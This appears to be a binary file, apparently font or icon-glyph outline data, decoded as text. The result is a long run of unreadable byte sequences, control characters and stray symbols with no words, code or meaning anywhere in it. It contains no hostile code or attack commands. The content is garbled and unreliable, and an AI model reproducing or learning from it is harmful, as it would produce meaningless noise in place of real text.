	FÏ!d%	1
=&	:
@(
¯.B, 90,7þá
*
	 	
0Œ$@!	)&
	
+
¨R:


	E,-	 N?*V

	3!	5B3'"#¢	"(.@ 	!6	
­		9(	

	±	.
 0
#	9	9k.P2/n +	

%ÿгè4?MYhw&'.67$7>'&74;22?6767654&564"32654&%6?6'&3?6'.776?6'.'"#"&7676#, 1&XB L8
Le3GE‚wP(
	ýš#"""x,

`	/%(a	 $
š '^Û
/qM

!	Ql6 =8Äa		
-ýÈ"0$#!áR
2WJ
:2å^"wÿ¨)9FJN&'#"32>54&''7'77%&#"32?!!276'"'&5>365'7›%1.$$.#;"8       ®*5=JG&#8.,
þìFÂ.6!EHCcz$$.+$";#.h   Ç~YS2"7("71›C#4" þÓ°´]7]ÿ¨)1>BF&'#"32>54&#53%&#"32?!!276'"'&5>365'7›%1.$$.#;"2vvˆ*5=JG&#8.,
þìFÂ.6!EHCcz$$.+$";#.Y!·~YS2"7("71›C#4" þÓ°´]7]ÿ¨( :GKO.'#"32>54&##5#53533%&#"32?!!274'"'&5>365'7›-.$.";"0*%**%*†*5;LG&#8.-
þìFÂ.8!EGBcz$.50";#.[**%**µ~YU0"7%%41›D"4# þÓ°´]7]ÿ¨)&@MQU&'#"32>54&"/&4?676%&#"32?!!276'"'&5>365'7›%1.$$.#;"*O/!?~*5=JG&#8.,
þìFÂ.6!EHCcz$$.+$";#.+N0!?¨~YS2"7("71›C#4" þÓ°´]7]ÿ¨å$(,&#"32?!!274'"'&5>365'7Á*5<KG&#:,,þb®Á.7 
!EHCcç~YS2"7.%4]›C#5% þÓ°´]7]ÿ¨:!M\n%.'#"32>54&''7'77'&'.'676767654./5#"356767&54675&632+#/532,.#.";"8 b3	%I+b3#/4+<b# >0þ»$	)® 8"/4":".g      ñ!!4@+aZý_[_
3O/X$5ýÃ
'<ÿ¨:EUg%.'#"32>54&#53'&'.'676767654./5#"356767&54675&632+#/532,.#.";"2tt‡3	%I+b3#/4+<b# >0þ» &	)® 8"/4":".X!à!!4@+aZý_[_
3O/X$5
ýÃ
'<ÿ¨:!JZl%.'#"32>54&##5#53533'.'>54'./5#"356767&54675&632+#/532,.#.";"0)%**%)‰-3(G-b3#/4+=a
" >0þ» &	)® 8$/3":".Z**%))Þ(&32" +aZý_[_
3O/X$5
ýÃ
'<ÿ¨:(Tdv%.'#"32>54&"/&?62762'&'.'676767654./5#"356767&54675&632+#/532,.#.";"*N/!>“3	%I+b3#/4+<b# >0þ» &	)® 8"/4":".*N0 >Ï!!4@+aZý_[_
3O/X$5
ýÃ
'<ÿ¨Û&:M.'&'>54'&'&/5#"3567>54632+#/532Ì-$ %+a3$.4+=a4M-þº	
)® 8 )

'44 $aZý^[_	,L?,[

ý
Â
'<ÿ¨T KTb%.'#"32>54&''7'77'&'.'&'5>54.'&'5##5##3353356767&54632++532.,/$	$/#;#8     Y	'5B#?$S%SpoT$T
Bþ²eF@<?pú)qvL"$„$/4$#;#/i       °-N>1C-	RNNNý2OOOT5TŒ./)1þõÎ9"ÿ¨TCLZ%.'#"32>54&#53'&'.'&'5>54.'&'5##5##3353356767&54632++532.,/$	$/#;#2vv	'5B#?$S%SpoT$T
Bþ²eF@<?pú)qvL"$„$/4$#;#/Z"Ÿ-N>1C-	SOOOý2OOOT5TŒ./)1þõÎ9"ÿ¨TIR^%.'#"32>54&##5#53533'&'.'5>54.'&'5##5##3353356767&54632++532.,.%(3#;#0*%**%*	
*5!5C$=%S%SppS%SBþ²eF@>=pù)8qvKF„$/41&#;#/]**&**0O>1C-	SOOOý2OOOT6SŒ./(2þõÎ,9$ÿ¨T&QZh%.'#"32>54&/&?6276'&'.'&'5>54.'&'5##5##3353356767&54632++532.,/$	$/#;#*O0!?‰	'5B#?$S%SpoT$T
Bþ²eF@<?pú)qvL"$„$/4$#;#/+O1!?-N>1C-	SOOOý2OOOT5TŒ./)1þõÎ9"ÿ¨ó*4A&'.'5>54'&'&'&'5##5##3353356?>54+532+532è
6!5C'S%SppS%S	0G.¸ <?pfEO*qvLF O=/$!	SOOOý2OOOT.P:!\/(2·þ>Î-8"ÿ¨5Xmy%46767&'&'&'&/&'&'&54676763267&'&'5##"&'356767&'&%&'#"32>54&''7'77
#%V

		
!*/	+>
#"[F:&I'
 #%1.$.#;"8       s!="

"
	39
Xa5#'.% (
# .,"
T`|#$.4";#.h       ÿ¨5Vjn%46767&'&'&'&/&'&'&54676763267&'&'5##"&'356767'&%&'#"32>54&#53
#%V

		
!*/	+>
#4 [
F:&I'
  €##2.$	$.#;"1vvs!="

"
	39
Xa5#'.% (#
 .,"
T`|##/4$";#.Y"ÿ¨5Wlx%46767&'&'&'&/&'.54676763267&'&'5##"'&'356767'&'&%.'#"32>5.##5#53533
"
" 9


!&-,"€	*? #4 [
F;%&")
#€#,/$#.";#/*%**%*s!=
	
	57	Xa5F2*8(#
--	
T`|$.,%";#/\**&))ÿ¨6Uiz%46767&'&'&'&/.547>763267&'&'5##"&'356767&'&%&'#"32>54&/&4?676
$%V	"%	*/	+>
#"[F:&I'
 #
#2.$	$.#;"*N0!>s!=
"

"
39
Xa5#'.% (
# .,"
T`~##/4$";#.*O0 >ÿ¨ØP&'./&'&'&54676763267&'&'5##"&'3567>54Í7&9

		
!,,"€	*?
#4 [
F:&I'
  €1B##
	57	Xa5#'.% (#
 .,"
T`:P0-ÿ¨= Nem%.'#"32>54&''7'77#5&/#3&'&#"327&54673654##"'&'.5467>32!5&47!-5'	&6#<#8       ?@	"‘‘2.'#'?,*07(3*@¾

)
cþ·†'/5&#<#0k  !    ˜LL.ƒ%$+01>_6
/OÁ
ýÕ4%6þ+ÿ¨=F]e%.'#"32>54&#53#5&/#3&'&#"327&54673654##"'&'.5467>32!5&47!-5'	&6#<#2xxe@	"‘‘2.'#'?,*07(3*@¾

)
cþ·†'/5&#<#0["‡LL.ƒ%$+01>_6
/OÁ
ýÕ4%6þ+ÿ¨=Mem%.'#"32>54&##5#53533#5&/#3&'&#"327&54673654#"'&'.546767632!5&47!-5'&6#<#0+&**&+g@	"‘‘3-(" ' !T07(3*@¾
bþ·†'/51&#<#0]++&**…LL.ƒ#%*.3>_/OÂ
ýÕ4% 3þõä+ÿ¨=%Qhp%.'#"32>54&/&?6276#5&/#3&'&#"32754673654#"'&'.546767632!5&47!-5'	&6#<#*P1!@q@	"‘‘3-+>'?,*/8'3*@¾

cþ·†'/5&#<#0,P1!@vLL.ƒF+01>_6

/OÂ
ýÕ4% 3þ+ÿ¨è'>I#5&/#3&/"327673654#"&'&'&546767632!!564'æ@	"‘‘!2.,<!'>-(1A'%/@¾
/	


+þïNÃLL#ƒB[4BZ7
H
ýÕ%6

þWÿºªY%&'#"32>54&''7'77!!!#327#".'&'#73'7#73676767632&'&#"†#0-"
	"-!9!6þZ2+þì(ã&»")$+:ad
z&Lq*S
03FIZ0412	"$/l¯!"-1"!9!-eÖ&8T U±6)
>pM%U T"O79 #,ÿºªQ%&'#"32>54&#53!!!#327#".'&'#73'7#73676767632&'&#"†#0-"
	"-!9!0qqþ62+þì(ã&»")$+:ad
z&Lq*S
03FIZ0412	"$/l¯!"-1"!9!-V Æ&8T U±6)
>pM%U T"O79 #,ÿ¼ªZ%&'#"32>56&##5#53533!!!#327#"&'&'&'#73547#736767>32&'&#"†#01&%2!8!.($(($(þ2
1+þí(â&º '%-8aŽ20
y&Kq*R13\6-03$")l°!$-3-#!8!-X(($((Â%8T T°7(		>86N%TT!K:9>%$

ÿ½ªÿ$_%&'#"32>54&/&?6276!!!#327#".'&'#73'47#73676767632&'&#"†!1-"#-!9!(K-<þ(0+þï(á&¹ ''.6a`
y&Kq*R
.5CIY9U8"$*l°!"-1#!9!-)K.<²";T
T°1%>mN%TT"Q4; 
%8%ÿ©f;%&'#"'37!547!7!676326767&'&#"#3#332767'&W
$'!+Ã'ì*þà-þÁ<q+!/7081_•gV,vN)€
35“f<-/@'
¸XX=%J)'BuR$X0X*Q9<?,ÿ¨:=%&'#"32>54&''7'773#3##"'5#53!%2/#	#/#;"8   þåççq(M3"1ccƧ%#/5$#;#.h       =¼$!##‚-<
‰‰‰S""%!ÿ¨78%.'#"32>54&#533#3##"'5#53!,0#
0#;"2vvþÄççr(M1#/ccŧ$.#;#.Y",¼"#& ‚-<‰‰‰S $'ÿ¨:=%&'#"32>54&##5#535333#3##"'5#53!#3/$	$.#;"/+%**%+þ½ççq(M3"1bbƤ#$/4$#;"/]))&**.¼$!##‚-<
‰‰‰S""%!ÿ¨6'E%&'#"32>54&/&4?627623#3##"'5#53!$2/#	#0#;"*O0 @þ½ççq(M3"1ccƲ%$.5$#;#.*O0!?¼$!##‚-<
‰‰‰S""%!ÿ¨3654'!#32753654'#53654'#5ˆ}þ:cc1@1™™ççŠ!%""ý­‰‰‰'&‚ &#"¼ÿ©z r%.'#"32>54&''7'773!32767#"'&'&'&547#736?#7!7>54'.#"'>323#T,/$	#/#;#8       ª
µþ§1,
GO>63/(
B[
0	-9%2(+(l2|A6;7+-Nq#05$#;#0j       B
/*
 9"!25A+'BC,+!r-)!-.B;%Cÿ©zj%.'#"32>54&#533!32767#"'&'&'&547#736?#7!7>54'.#"'>323#T,/$	#/#;#2vvÐ
µþ§1,
GO>63/(
B[
0	-9%2(+(l2|A6;7+-Nq#05$#;#0["B
/*
 9"!25A+'BC,+!r-)!-.B;%Cÿ©x l%.'#"32>54&##5#535333!32767#"&'&'&547#736?#7!7>54.#"'>323#R-.$	$.#;#0*&**&*϶þ¦1,
GO>j-)B[
0
,:%2(+(l2|A6;7W4Oq $/5$"<#/\++%**B.*
 9 ! 33C.$BC-*(!r-)>_@9'Cÿ©z&x%.'#"32>54&/&4?6276'3!32767#"'&'&'&547#736?#7!7>54'.#"'>323#T,/$	#/#;#*O0!?Û
µþ§1,
GO>63/(
B[
0	-9%2(+(l2|A6;7+-Nq#05$#;#0,O0 ?øB
/*
 9"!25A+'BC,+!r-)!-.B;%Cÿ¨@F37#654.'&#">32!3#332767'#"&'.54767!7#>¿qN5T8;6A?;4lM,*<*
þя[A3Qq<LIG5pX31Zµ
0uC(8B]=/r"

(*-CB$/Ce@">m).
..
Bÿ¨…x%.'#"32>54''7'773#3#3!'7>767675#&'5&47673'#&'5&475673'46767632&'&#"`,4J
%4#:"J   þn¯ •ŽÏ4+ýÖ)	Š~
te$$'78M>4.+	,#.$8
J4%":#4T     æ
	@
*
$*
0NH'
*

@

*2_&'

"&&	
ÿ¨…p%.'#"32>54#533#3#3!'7>767675#&'5&47673'#&'5&475673'46767632&'&#"`,4J
%4#:"DuuþH¯ •ŽÏ4+ýÖ)	Š~
te$$'78M>4.+	,#.$8
J4%":#4E!Ö
	@
*
$*
0NH'
*

@

*2_&'

"&&	
ÿ¨€ z%.'#"32>54##5#535333#3#3!'7>7>7#&'5&4673'#&'5&475673&547>7632&/&#"Z,.%
".";"C*%))%*þQ®Ÿ
•Ð4+ýÖ#	Š}
seM68N>40)	
$%,$8%4#";"5H**%**Ô
*

@

*

$*
0N?#)4*
@
.4-O
,($
"ÿ¨…%%.'#"32>54"/&?62763#3#3!'7>767675#&'5&47673'#&'5&475673'46767632&'&#"`,4J
%4#:"=M/ ?þ?¯ •ŽÏ4+ýÖ)	Š~
te$$'78M>4.+	,#.$8
J4%":#4N0 ?Ç
	@
*
$*
0NH'
*

@

*2_&'

"&&	
ÿ¨&Y%&'!67673764'5&'#'3>4&/#&54767>326767.#"#3#3!6764%þÍ•
Ÿ®
8$3'
+[EP5:H$ds
}‰

&8*$
 
*@+
+!(K`2?&!B2ÿ§~NYg%&'#"32>54&''7'77#&'&'.#"#376732767>326767364+"'53'563632%1.$	$/#;"7     ¹]15v<98$D{{)**
@$"_þâ)	Ïϵ$$/4$#;#0j       »B)<"ô # ýü
*'96a 
ackÿ§~FQ_%&'#"32>54&#53#&'&'.#"#376732767>326767364+"'53'563632%1.$	$/#;"1vv“]15v<98$D{{)**
@$"_þâ)	Ïϵ$$/4$#;#0["ªB)<"ô # ýü
*'96a 
ackÿ§~NYg%.'#"32>5.##5#53533#&'&'.#"#376732767>326767364+"'53'563632-.$(3#;#/*&**&*‘]15v<98$D{{)**
@$"_þâ)	Ïϵ$/41&#;#0]**&**¨B)<"ô # ýü
*'96a 
ackÿ§~%T_m%&'#"32>54&/&4?6276#&'&'.#"#376732767>326767364+"'53'563632%1.$	$/#;")O0 @‡]15v<98$D{{)**
@$"_þâ)	Ïϵ$$/4$#;#0,O0!@™B)<"ô # ýü
*'96a 
ackÿ§~(4B#&'.#"#33;2727332>767364+"'53'#56372{]b{<89&H||:y` _þâ
5 
Ð"«
>-9Cô3ýüA;'83^aok!ÿ¨r Uals%&'#"32>54&''7'77#&'."#3#33;27327232767>7676735#654'3%63632#+"'537#53M$2/#.#;"8     ;V	
czu8%JKKKK!:<J/
SLMþ-

º¦!
Â
ÓÑå%#/5#;#.h       Á :B½6M6þ+6$7
jÜBMMÿ©rLXcj%&'#"32>54&#53#&'&'&'&"#3#33267232767>7676735#654'3%63632#+"'537#53M$2/#.#;"2wwV!059=u8$DKKKK5!:<J/
SLMþ-

º¦!
Â
ÓÑå%#/5#;#.Y"° ;"½6M6þ+6"7
jÜBNLÿ©sQ]ho%.'#"32>5.##5#53533#&'&'."#3#3267232767>7676735#654'3%63632#+"'537#53M-/#$.#;#/+%**%+V!01zu8%JKKKK 6:<J/
SLLþ-

º¦!
Â
ÓÑå$.5/$#;#/\**&**® ;!½6M6þ+6&7jÜBNLÿ©r&Wcnu%&'#"32>54&/&4?6276#&'."#3#33267232767>7676735#654'3%63632#+"'537#53M$2/#.#;"*O0 @	V	
czu8%JKKKK5!:<J/
SLMþ-

º¦!
Â
ÓÑå%#/5#;#.*O0 ?Ÿ :B½6M6þ+6$7
jÜBMMÿ¨[-9DK#&'.#"#3#376732>76735#654'3%63632#+"'537#53ZV	dz<3$$DKKKK )*:wdTMMþ-

º¦	Â
!ÓÑL!9C½7L6þC9$7
jÜ
BkLÿ¨mq%&'#"32>54&''7'773#3!'767>7654'&'#&5&47473&/&54>7632&'&#"H%2.$#.#<"8      þ‡¾©¹4+ýñmY$I79K=4-+	'2###041"#;#0j       è"+
+"0	/L
'8&#


2aJ

"&&

$ÿ¨mi%&'#"32>54&#533#3!'767>7654'&'#&5&47473&/&54>7632&'&#"H%2.$#.#<"1wwþa¾©¹4+ýñmY$I79K=4-+	'2###041"#;#0["×"+
+"0	/L
'8&#


2aJ

"&&

$ÿ¨mr%&'#"32>54&##5#535333#3!'767>7654'&'#&5&47473&/&54>7632&'&#"G#3.%.#;#0*%**%*þ`¾©¹4+ýñmY$I79K=4-+	'2##$/41#;#0]**&**Õ"+
+"0	/L
'8&#


2aJ

"&&

$ÿ¨j&s%&'#"32>54&"/&4?62763#3!'7>767654/#'&'&4?3&'&54767>32.#"E%1/$	$/#;")O/ @þ[¾©¹4*ýñnY&#rK=4-+	$;3#8
¤##05$#;#0,O0 ?¿#"	 
)I*/K
8&) 
)+
!* 20.($0

&!+ÿ¨W%4'5!67654'4'37>54'&'#'&'&54767676326767.#"#3!76?4þÆ©¾	
$-#$	+[CO58GXm2,"*$	

"

&&"G302 $,

#&8'
&ÿêöNW%&'#"32>54''7'77%7&'&'&'&=&75#&'6767#5!#6'5!!56†!0-$
	!-!8!HþÚ#'3*U2
+ ;.N&!½™º„ýÕ)Ø!"4!!7!2Pvi $3'$$%.(3==
2;1&87'60EeV{ˆ†%qÿêöDM%&'#"32>54#53%7&'&'&'&5'5#&'6767#5!#6'5!!56†!0-$
	!-!8!Bppþ¶#'3*U1
, :.N&!½™º„ýÕ)Ø!"4!!7!2B fi $4'$$%.&09H<2;1&96(50EeV{ˆ†%qÿêö NV%.'#"32>54&##5#53533%7&'&'&'&5'5#&/6767#5!#6'5!!6†*0&
	&0!8!-(#((#(þ´#%5+T1
, :'N&!½™º„ýÕ(Ø$,0$!8!,V((#((di #4%	#$%.&09H<3;0&96(5*DfV{‡†%qÿêö$QZ%&'#"32>54/&?676%7&'&'&'&5'5#&'6767#5!#6'5!!56†!0-$
	",!8!:K-;þ­#'3*U1
, :.N&!½™º„ýÕ)Ø!$2! 8!2K.;
Xi $3'$$%.&0:H<2;1&96(50EeV{ˆ†%qÿ¤u-5%#.535!3676767>737>45!!76ng'=!Èý4Ì#)U2?"/5 [-1J$ký«R‡##'"’„\mJ6:+:='2y@5>3)1('&?_e/.zÿ®©!(¤%4&'&'#"32>'''7'7767&'2764'#"&'&5'632654'&#"#4/#'7&547'#"'&547'3276?#"''267654'6767&?$2/#
/#;"K     Š+0"Z?!&$I/
3*	"3>.-7		+% ?T! *,"&4 
#Koh"'$# -+$'¾.%$.#;   =!"#>8/`R)F)#"=t
.&!+¢a ©?.ž+G.	 	Tˆ0#<ask20HM#%.1<3QU@9*.K#W.,0=%ÿ®©Ž•œ%4&'&'#"32>'#532764'#"&'&5'632654'&#"#4/#'7&547'#"'&547'3276?#"''267654'6767&'67&?%1.$
/#;"Evv3?!&$I/
3*	"3>.-7		+% ?T! *,"&4 
#Koh"'$# i+0"¡-+$'¼0$$/#;"y8/`R)F)#"=t
.&!+¢a ©?.ž+G.	 	Tˆ0#<ask20HM#%.1<3QU@9*.K#W.,%=!"#=%ÿ­ª –¤%4.'#"32>'##5#535332764'##"'&'&5'632654&#"#4/#'7&547'#"'&547'3276?#"''267654'6767&'67&@#,5&
(3#;#D*&**&*1?!&$'#2*	+#2?/-7		+%!?T! *,"&3!
#Koh"'$# i++!
%Ÿ-4#¼.#&.&#;**&)){8/`R'F("=s
.%!$,¤_!˜Q/ž+G.	 	W…0$<aui	20HM#$.1<3ST@9*.K#W.,&<!#="!"ÿ®ª%,3¨%4&'&'#"32>'/&?627667&67&'72764'#"&'&5'632654'&#"#4/#'7&547'#"'&547'3276?#"''267654'67?$2/##/#;"=O0!?Z+0
%Ì+$'(G?!&$I/3)	"2@.-6	,% 
?T! *,"&4 
"Joh"($# ½.%$.+$#;@N0!?®=!!#/%08/`R)F)$"=t
.&!+¢a ©?.ž+F/	 	D˜0$<ask20HM#%/0<3QU@9+.K#W.,ÿ¨Ov}„&#"27&'673#"'&54/#"&4732767674/#".54732767'&/&5467367&'673632&'7&'$B&5
H$% ?7 "'#!g7IT25#%!+	* *R?
 $+	
 6,-@0!,!!,¢+0 =u>"*F'T_09,/X$M-!(N-XP4=f¥Z
@6$=$$NI	07#lta>%0(‡0'
=	0G+ -C©$Y­+"%0þƒ! H"##ÿ¨1 Nc%&'#"32>54&''7'77.'&#"#3#376753546?#532767>4'7>32!4/#.";"7  U49-1/_^^^^##T‰##26O6£)”##.5";#.h   Z1:

þ€?W>’’ 9V
5eŸ
6Iÿ¨1F[%&'#"32>54&#53.'&#"#3#376753546?#532767>4'7>32!4/#.";"1uuU49-1/_^^^^##T‰##26O6£)”##.5";#.Y!J1:

þ€?W>’’ 9V
5eŸ
6Iÿ¨1Mb%&'#"32>54&##5#53533.'&#"#3#376753546?#532767>4'76372!5/#
#.";"/*%))%*
U49-1/_^^^^##T‰##26O6£)”##.5%";#.[**%**H1:

þ€?W>’’ 9V
5eŸ
6Iÿ¨1&Ti%&'#"32>54&/&?6762.'&#"#3#376753546?#532767>4'7>32!4/#.";")N0!>U49-1/_^^^^##T‰##26O6£)”##.5";#.+N0!?;1:

þ€?W>’’ 9V
5eŸ
6Iÿ¨0E%#532767>4'&'&'&#"##3#37675!64'276372'd›##26O6-(69-1/@R___
#$
:þÆ)ºV
5ež4/
þ@W>’’?Û3O1ÿ¨BQ%&'#"32>54&''7'77##"'&'&=46;267!&47!&+&54?!##3.$	$.#;"8     y†kLh-&o
Æt	FSg
þá$…m/£
“#$.5$";#.h       /YqO{
.LézO	
63/F!0(1ÿ¨BI%&'#"32>54&#53##"'&'&=46;267!&47!&+&54?!##3.$	$.#;"2vv$y†kLh-&o
Æt	FSg
þá$…m/£
“#$.5$";#.Y"	/YqO{
.LézO	
63/F!0%4ÿ¨C R%.'#"32>54&##5#53533##"'&'&=46;267!&47!&+&54?!#,/$.";#0*%**%*&y†kLh-&o
Æt	FSg
þá$…m/£
“$.50";#.[**%**/YqO{
.LézO	
63/F!0%4ÿ¨B(Z%&'#"32>54&"/&4?62762##"'&'&=46;267!&47!&+&54?!##3.$	$.#;"*N/!?.y†kLh-&o
Æt	FSg
þá$…m/£
“#$.5$";#.*O0!?û/YqO{
.LézO	
63/F!0%4ÿ¨6&'364'!32!!+";276'&'>73654'‘
£ýÑm…$þê
gSGtÆ
{	µmk†yS2'0	%F 36Ozé
ÚsqY ÿ’ª	o%&'#"32>54&''7'77''&76'5"'"/354'&/"/&47336#7676?#.'&7>76†$/-#
	#-!9"6R4F	;PŽc0
	J¨
>W"	$	†)'+r082$;X‡##-1""9!-e¦R68.u#*5ib	L£"?%3	,Z?		#è(+Aj40#(@>AÿŽªi%&'#"32>54&#53''&76'5#"'"'&/35&'&/&#/&4732236#7676?#.'&7>76…"1.#!."9"1ssq5F	;Q‘b%
 ©
>W
#

‡)P7#'182%<X…"#-3/!"9"-W!—S68.v#*;xO"¤$ >$4	-Z@	
ê(+ '-840$)@>Aÿ¥ª q%.'#"32>54&##5#53533'&'&76'5"'"'&'354'&'&1/&4732236#7676?#.'&7>76…+-#
!-"9"/)$))$)s5F	:RG{11
	#'©

>W" 	ˆ)P7#'182$=X…#-2#"9"-X))$))•S68%:#+;wO	#*£"?&2(PO	ê(+ '-840#)@>Aÿ’ª	&v%&'#"32>54&"/&4?676''&76'5"'"/354'&/"/&47336#7676?#.'&7>76†$/-#
-!9")L. =‚4F	;PŽc0
	J¨
>W"	†)'+r082$;X‡##-1"9!-)L. =…R68.u#*5ib	L£"?&2,Z?	

è(+Aj40#(@>Aÿ†hI.3'&=3'&'&"'56'4'&'&'&+32#337676LY=%382t,RŠ
!) "Y?	¬$2e’©L#U?B*$15mBQî)	A[.
6%@ "§'	Qy<+$y06¹Vÿ¨ U&'#"32>54&''7'77+'#"&'?6='?56?%776767j%2/$0#<"7       *		g  B'

д³˜!%ìéÓb7?a#$/5"<#0j       §
k@Š8 7Š/«€PˆIHˆBþåF$ÿ¨M&'#"32>54&#53+'#"&'?6='?56?%776767j%2/$0#<"1wwP		g  B'

д³˜!%ìéÓb7?a#$/5"<#0["¸
k@Š8 7Š/«€PˆIHˆBþåF$ÿ¨T&'#"32>54&##5#53533+'#"&'?6='?56?%776767j%24(
'5#;#0+%++%*Q		g  B'

д²˜!%ìéÓb7?a#&/5%"<#/\**&**º
k@Š8 7Š/«€PˆIHˆBþåF$ÿ¨'\&'#"32>54&"/&4?6276+'#"&'?6='?56?%776767j%2/$0#<")O0!?\		g  B'

д³˜!%ìéÓb7?a#$/5"<#0,O0!@É
k@Š8 7Š/«€PˆIHˆBþåF$ÿ¨l654'?4&?5&/77363676767ç!µ
Óéìþû!%˜³´Ð=žiZV
º8	»^AˆHIˆP€«/Š7 8ŠAþ”
o	ª°\_cfjmq%&'#"2654&''7'777#&'&#"#&#"#&'&#"#3#332?332?&5467#7365'37#'37#73'37#'3&)R:,EE5YBBT6)!ECP	Yf2 &6n3-%&	SýÆ	
-<‡#	@	2	Bõ$(:)$QÕ&þÚ&þÚ&þÚ
'
&	(	ØØØX!)$=&
±3:&ƒHa&&z@:&	ª°TW[^bei%&'#"2654&#53'#&'&#"#&#"#&'&#"#3#332?332?&5467#7365'37#'37#73'37#'3&)R:'[[EE5YBBT6)!ECP	Yf2 &6n3-%&	SýÆ	
-<‡#	@	2	Bõ$(:)$EÈ&þÚ&þÚ&þÚ
'
&	(	ØØØX!)$=&
±3:&ƒHa&&z@:&	ª±^aehlos%&'#"2656&##5#53533'#&'#&#"#&#"#&'&#"#3#332?32?&5467#73656''37#'37#73'37#'3Œ&)
S9%    EE5YBBT6)!ECP	Yf2%&6n3'G&	RýÇ	-<‡#	@	2	Aõ$(:)$G  !!Ç&þÚ&þÚ&þÚ
'
&	(	ØØ×W!)$='	Ä3:&ƒHa&&z@:&	ª±%hkorvy}%.'#"2656&/&4?6276'#&'#&#"#&#"#&'&#"#3#332?6?32?&5467#73656''37#'37#73'37#'3
#)R9!<%	1EE5YBBS7) DCP	Yf2!
	6n3!R&	RýÇ	
-<‡#	@	2	Bõ
$(:)$!=%	1	½&þÚ&þÚ&þÚ
'
&
'
רØW!*$<&
Ä3:&ƒHa&&z@:&ÿíªÏ>CFKNSV#7364'#'&#"#&#"#&#&#"#3#32736?32?364'%3#/#73#'37#733…@
YKL% :aH"
G\;-#JIX	ap6$:
;y7,K$7rþö<6	'Ì8	0ÓKE
Œ
*Bþ¾Bþ¾Bþ¾
+
*
+ëëëë+
***?P**j7w**@Fÿ©rU%&'#"32>54&''7'77&#"&#"#3#33272753>7#5365654'L#2.$	$.#;"7       ˜Ð6)-2¡¤2,08ГÎÎÎ:"[ã¦##/4$";#.h   Fzþ­Sþ†	(	V
'	¿¿ 6U	!ÿ©rM%&'#"32>54&#53&#"&#"#3#33272753>7#5365654'L#2.$	$.#;"1vv¾Ð6)-2¡¤2,08ГÎÎÎ:"[ã¦##/4$";#.Y"5zþ­Sþ†	(	V
'	¿¿ 6U	!ÿ©rU%&'#"32>54&##5#53533&#"&#"#3#33272753>7#5365654'L#33(

'4";#0*%**%*¿Ð6)-2¡¤2,08ГÎÎÎ:#\ã¦#&.2%";#.[**&))3zþ­Sþ†	(	V
'	¿¿!5U	!ÿ©r&X%&'#"32>54&"/&4?6276&#"&#"#3#33272753>7#53?4'M#3.$

#.";"*N/ ?ËÑ6*.0¡¤2,08ДÎÎÎ:#[ã¦#$.2%";#.*O0!?$zþ­Sþ†	(V
'¿¿!5Uÿ©Y7%#&'&476735#&'&476736326323#3##"'&'šÍÍÍ“Ð80,2¤¡2,*6Ñ©ããã:n(	U	(	zþ­Sþ†	V	¿ÿgë[ $6'&'&'&'5&6767676'!!é&7w+-0/@‡<
"þXª
à 
	

/ý!2#


ÿj"R!"3!2654&!!ùýõ!þçRüh˜ü‚ÿj RSg"=4&'./&'.+";2676?6767>=763276=4'&+"4;26=4&#+".=4>;2
	
;'–';
	


<'–'<
	
	
%@%ø%@&&@%ø%@%Ø!:	F $--$ C<#þú#;	S $--$ U	:!
-33ö%>%%>%ó%?%%?%	ÿüéÁ,<EU`n3#"264&3#!!2?6#!"3!2674+"&=46;2'"&4627+"&=46;2%'&764'7'&3?6c00

#00oýë²püõ
[
ý1NN5,NNá"þØR(B6)6*Ï5X
Š6niþñsnýÊ
áþ‚		R. , .—		S{#þÕT+C6)6+ÿjÊR{32673264&+.+%#";#!532>=>=4.+";+.+"#"&547>;;5#"#&;;267!2>5>=4.f>i
i>ð3I.N.þþ½(E(64J1"½
	.

¾"12
??-8+(E(¾
.@l@6¿

=2H1gþ<.N.Z(E(sž62H1gs"1


K0"#V)8ýì(E(K

@l@Äž6ÿjåR&"2764'7/77VAþ0"•<РŠ´(!(!)!‚þ0!!–ÐA• Å ') (6!(!ÿ§œ1AJSlu%&/&'&'#'&'&/#'"3%26=6+"&=46;2"&>"&462";>7>?564."&462‰

!0@

$3Q7 +0
ppýêõõU
R þ°%>% "'!%>%'77N77Z'+(	".0'8#K
  E*2þ|%“%½1*m$$
ÿúÿ]ïR#s˜¡ª³%"264&'"264&"264&'"264&&'.54&+"&46;26=4&"+";2#&'&'&'&673277>76%#"&=#"&46;546232"&462'"&462"&462'"&462/		

		



		

		610y:$)"6&†""À

Ÿ&77&†"!(#9x/10	I9@†0772=1‡A:J	ý\C

C

C

C		H**‚))|



˜



v



˜



GXEB=
	;&7"1#C

"7M6#2	
>BD²SRrQQRPrQS9C

C

D		D

v**˜**º**˜**
«…Of{¬µ¾ÇÐÜ236263723632&'.'&'&'&'.#&#"&54?>76'&6767636"7276?64/&'&3"&76232654.'67676'54&#&;2=&76'&/&"264&'64&"74&"26'264&"'224+"3a	%6m*M6	M"-
3&
	%
$!J2#%'4+‚

	w

g

	°*
¼…¾
Jn*F*#0%Æ$
##+
"2
6v3` #	¦

L	
£
	



		

Xÿ÷ÿiñR(1:\%.#&+""!2767>##5#53533"&4627.>223#"353265654&#!5#äPwCI‘1b15!M74,5U~‰&Ff-ý˜iHkjHjé!//B00’"//B/0þ
¸¸	Õk¹(("þk»Bj>53HK;\cˆkjGkjÎ0A0/B0/B/0B/3G	%#&9r!G"C!ÿÝèø–ÇÔ%"'."5&/&/&'&""/&'.#"5'&/&'&+";2676?6?463>?676?6276?4236355&3>=4&+&76#&"36=6'&4'&'7>5&7‹	
	&$	
			ýL""“Ô^OM-/#U!#$"K¦bÇ_™!$"5FQ"›	

#+

	

 $	
	


!	M	¥	¶€76QS^Gk""!Ì"$Òa:>cÇ# Ï "Gd…C¯þ³
§

	$ÿüÿdêSK45&'&'.767>&'.'&'.'&'.67>7>76&7654
 –pav06-}	D!I,DB	ŸD?&	..$%˜l5!/'X51	<>#7][
D"8,ke
dbƤ8U!4:¼1'`S0'dq@;]	Z<2'A+ ÿÝèø5D55&3>=4&+&76#"36=6'&4'&'&'7>5&7""“Ô^OM-/#79!#$"K¦bÇ`˜M$"5FQ"N	¥	¶ 
76QS^Gk""!Ì"$Òa:>dÆ# gh "Gd…C¯þ³	
§

	$ÿjµRJ737;26=4&+"'&732654&+676762#";2654'&'&'&"N*bMy…

…e;P9P30OQ¶QO12T–>;cfçeb<>
5m/%

!V7^QP.00/OQ^þÉ
7
wgd<==;cgv
þÉÿÛªá5&'&'&";5>54&'676762326=4&i32TVÈWT14$4%G
&%>@”@>%&
G%5%]jZX3553XZj	3!Ã(::
OCA''''ACO
þÅ
9)Ã!4ÿjãR'!"3!2654&#!"&=!%!!5463!2µþˆ"#xþˆÊþK þ6xRü$#üR:ýÿÝèß*.&'./#;27>'!"3!2654&!!Ò%("-#'$@üJ
¶
